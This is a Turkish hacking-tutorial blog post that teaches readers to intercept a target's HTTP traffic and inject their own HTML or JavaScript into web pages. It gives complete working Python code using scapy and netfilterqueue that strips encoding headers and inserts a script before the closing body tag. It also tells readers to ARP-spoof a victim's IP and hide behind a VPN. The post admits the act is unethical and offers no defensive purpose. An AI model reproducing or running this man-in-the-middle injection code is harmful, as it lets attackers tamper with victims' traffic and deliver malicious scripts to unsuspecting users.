Facebook

Header Ads

Python Hacking / Ders #2 - Mossarb

 Yazılım Kampı

Python Hacking / Ders #2

Merhaba Sevgili Arkadaşlar,

Bugün Sizlerle Kaldığımız Yerden Devam Edeceğiz.

Bugünkü Konu:

Python ile Bir Websitesinin İçine Kendi (Html, Css, Javascript) Kodunuz Enjekte Etmek.

Bu işlem Etik Değildir Bu Nedenle mossarb.net Yaptığınız İşlemlerden Sorumlu Değildir.

---

Not: Büyük Web Sitelere Yapmanız Tavsiye Edilmez Aksi Takdirde Başınıza Bela Alabilirsiniz.

---

Bunu Yapmadan Önce Kimliğimizi Gizlemek için bir VPN ve Kali Linux Kullanmak Kesin Olarak Gerekiyor.

İnternet Üzerinden bir Vpn ve Kali Linux Kurunuz.

VPN https://www.vpnbook.com/

Kali Linux https://www.kali.org/

---

İlk Olarak Kali Linux Sanal Makinesinin İçine Giriyoruz Daha Sonra Terminali Açıyoruz ve Oraya Şu Kodu Kopyalıyoruz;

$ pip install scapy==2.4.5 netfilterqueue colorama

Bu işlemi yaptıktan sonra Kurulmasını Bekliyoruz, Bittikten Sonra ise

Tekrar Terminale, pip install colorama yazıyoruz ve kurulmasını bekliyoruz buda bittikten sonra Son olarak Terminale, pip install scapy yazıyoruz ve kurulduktan sonra Terminali Kapatıyoruz.

---

Şimdi ise Python Kodu Yazmamızı Sağlayacak Programa Geliyoruz Ve Bir Python (.py) Dosyası Oluşturuyoruz.

Ve içine şu kodları yazıyoruz:

from scapy.all import *
from colorama import init, Fore
import netfilterqueue
import re

Bunlar Projemizde Kullanılacak Python Kütüphaneleri.

Devamında,

init()


GREEN = Fore.GREEN
RESET = Fore.RESET

Burada ise Renkleri Seçtik.

Sonrasında,

def process_packet(packet):
  """
  This function is executed whenever a packet is sniffed
  """
  
  spacket = IP(packet.get_payload())
  if spacket.haslayer(Raw) and spacket.haslayer(TCP):
    if spacket[TCP].dport == 80:
      
      print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")
      try:
        load = spacket[Raw].load.decode()
      except Exception as e:
        
        packet.accept()
        return
      
      new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)
      
      spacket[Raw].load = new_load
      
      spacket[IP].len = None
      spacket[IP].chksum = None
      spacket[TCP].chksum = None
      
      packet.set_payload(bytes(spacket))

Burada NetfilterQueue Bağlanmak için paketi parametre olarak kabul eden bir fonksiyon yazmamız gerekiyor.

Devamı,

if spacket[TCP].sport == 80:
      # HTTP
      print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")
      try:
        load = spacket[Raw].load.decode()
      except:
        packet.accept()
        return
      
      # print("Load:", load)
            added_text = "<script>alert('Javascript Injected successfully!');</script>"
      
      # added_text = "<p><b>HTML Injected successfully!</b></p>"
      
      added_text_length = len(added_text)
      
      load = load.replace("</body>", added_text + "</body>")
      if "Content-Length" in load:
        
        
        content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))
        
        new_content_length = content_length + added_text_length
        
        load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)
        
        if added_text in load:
          print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")
     
      spacket[Raw].load = load
      
      spacket[IP].len = None
      spacket[IP].chksum = None
      spacket[TCP].chksum = None
      
      packet.set_payload(bytes(spacket))
  
  packet.accept()

Burada HTTP Yanıtlarını Algılama Fonksiyonun Devamını Yaptık.

if __name__ == "__main__":
  
  queue = netfilterqueue.NetfilterQueue()
  
  queue.bind(0, process_packet)
  
  queue.run()

Artık Çalıştırabiliriz.

---

Eğer Karşı Kişinin IP Adresine Sahipseniz Aşağıdaki Kod ile karşı kişinin makinesinde çalıştırabilirsiniz.

$ python3 arp_spoof.py 192.111.11.1 192.222.22.2

Not: Kesinlikle Linux İşletim Sistemi Gerekiyor Aksi Takdirde Program Çalışmaz.

---

HTTP Paketlerine Kod Enjekte Etme,

$ python http_code_injector.py

Tam Kod:

from scapy.all import *
from colorama import init, Fore
import netfilterqueue
import re

# initialize colorama
init()

# define colors
GREEN = Fore.GREEN
RESET = Fore.RESET


def process_packet(packet):
  """
  This function is executed whenever a packet is sniffed
  """
  # convert the netfilterqueue packet into Scapy packet
  spacket = IP(packet.get_payload())
  if spacket.haslayer(Raw) and spacket.haslayer(TCP):
    if spacket[TCP].dport == 80:
      # HTTP request
      print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")
      try:
        load = spacket[Raw].load.decode()
      except Exception as e:
        # raw data cannot be decoded, apparently not HTML
        # forward the packet exit the function
        packet.accept()
        return
      # remove Accept-Encoding header from the HTTP request
      new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)
      # set the new data
      spacket[Raw].load = new_load
      # set IP length header, checksums of IP and TCP to None
      # so Scapy will re-calculate them automatically
      spacket[IP].len = None
      spacket[IP].chksum = None
      spacket[TCP].chksum = None
      # set the modified Scapy packet back to the netfilterqueue packet
      packet.set_payload(bytes(spacket))
    if spacket[TCP].sport == 80:
      # HTTP response
      print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")
      try:
        load = spacket[Raw].load.decode()
      except:
        packet.accept()
        return
      # if you want to debug and see the HTML data
      # print("Load:", load)
      # Javascript code to add, feel free to add any Javascript code
      added_text = "<script>alert('Javascript Injected successfully!');</script>"
      # or you can add HTML as well!
      # added_text = "<p><b>HTML Injected successfully!</b></p>"
      # calculate the length in bytes, each character corresponds to a byte
      added_text_length = len(added_text)
      # replace the </body> tag with the added text plus </body>
      load = load.replace("</body>", added_text + "</body>")
      if "Content-Length" in load:
        # if Content-Length header is available
        # get the old Content-Length value
        content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))
        # re-calculate the content length by adding the length of the injected code
        new_content_length = content_length + added_text_length
        # replace the new content length to the header
        load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)
        # print a message if injected
        if added_text in load:
          print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")
      # if you want to debug and see the modified HTML data
      # print("Load:", load)
      # set the new data
      spacket[Raw].load = load
      # set IP length header, checksums of IP and TCP to None
      # so Scapy will re-calculate them automatically
      spacket[IP].len = None
      spacket[IP].chksum = None
      spacket[TCP].chksum = None
      # set the modified Scapy packet back to the netfilterqueue packet
      packet.set_payload(bytes(spacket))
  # accept all the packets
  packet.accept()


if __name__ == "__main__":
  # initialize the queue
  queue = netfilterqueue.NetfilterQueue()
  # bind the queue number 0 to the process_packet() function
  queue.bind(0, process_packet)
  # start the filter queue
  queue.run()

Çalıştırma:

İlk Olarak Hedef Kişinin IP Adresini Bulun Eğer Nasıl Bulacağınızı Bilmiyorsanız Bu Yazımızı Okuyun.(www)

Daha Sonra Yukarıdaki Kodları Python Dosyanıza Yazın ve Şu Kodu Terminalde Çalşıtırın,

$ python3 arp_spoof.py BULDUĞUNUZ IP BURAYA GELECEK

Burası da Bittikten Sonra,


Terminalde Böyle Bir Görüntü Alacaksınız Daha Sonra Hedef Kişinin Web Sitesine Gidin ve Enjekte Ettiğiniz Kod Çalışacaktır.


Bir Sonraki Derslerde Görüşmek Üzere...
---
Takipte Kalın
---
Kaynak: 

Yorum Gönder

0 Yorumlar